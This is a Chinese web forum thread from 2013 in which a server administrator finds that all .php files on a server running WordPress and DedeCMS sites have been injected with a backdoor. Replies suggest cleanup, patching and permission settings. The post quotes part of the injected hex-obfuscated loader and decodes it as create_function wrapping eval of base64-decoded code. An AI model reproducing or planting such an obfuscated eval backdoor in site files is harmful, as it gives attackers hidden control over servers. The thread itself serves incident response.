用户名: 密码: 忘记密码? 注册
收藏此问题 发表新评论

整台服务器.php文件被挂码!请问从何查起

这台服务都放的一些开源产品,如wordpress dedecms什么的

今天发现所有.php 文件前面都加了句
<?php $zend_framework="\x63\162\x65\141\x74\145\x5f\146\x75\156\x63\164\x69\157\x6e"; @error_reporting(0); $zend_framework("", "\x7d\73\x40\145\x76\141\x6c\50\x40\142\x61\163\x65\66\x34\137\x64\145\x63\157\x64\145\x28\42\x4a\107\x56\62
.........后面还有很长
?>

应该是这样的
$zend_framework = "create_function";
@error_reporting( 0 );
$zend_framework( "", "}; @eval(@base64_decode('.....里面开始是加密的程序')");


请问大家有遇到过吗?该如何处理,非常感觉谢了

昵称: 枫叶  时间: 2013-06-09 14:48:20
在线等了,兄弟姐妹们
昵称: 枫叶  时间: 2013-06-09 14:50:15
下载下来所有的php,用批量替换掉
这个是第一步,
第二步打补丁
打完补丁后,修改一些配置如果你用的是dede需要动大手术
比如 data底下的目录,后台管理目录的改名
昵称: 大水车  时间: 2013-06-09 15:16:27
大水车 发表于 2013-6-9 15:16
下载下来所有的php,用批量替换掉
这个是第一步,
第二步打补丁

谢谢了兄弟,因为服务器上不止一个站,我先下一个站来弄一下,
第一步替换已经快好了,
第二步我打算把所有目录权限都设置为555都不可写,但上传目录的权限改为666 不可执行。
第三步就是你所说的了。
昵称: 枫叶  时间: 2013-06-09 15:21:42
每个目录的权限不同的哟

第二步,不是那么容易的哟,比如一些是可写但是不可执行,一些是可执行但是不可写,比如php的,一般设置成可执行,不可写
昵称: 大水车  时间: 2013-06-09 15:28:34
发表评论
昵称:
内容:
验证: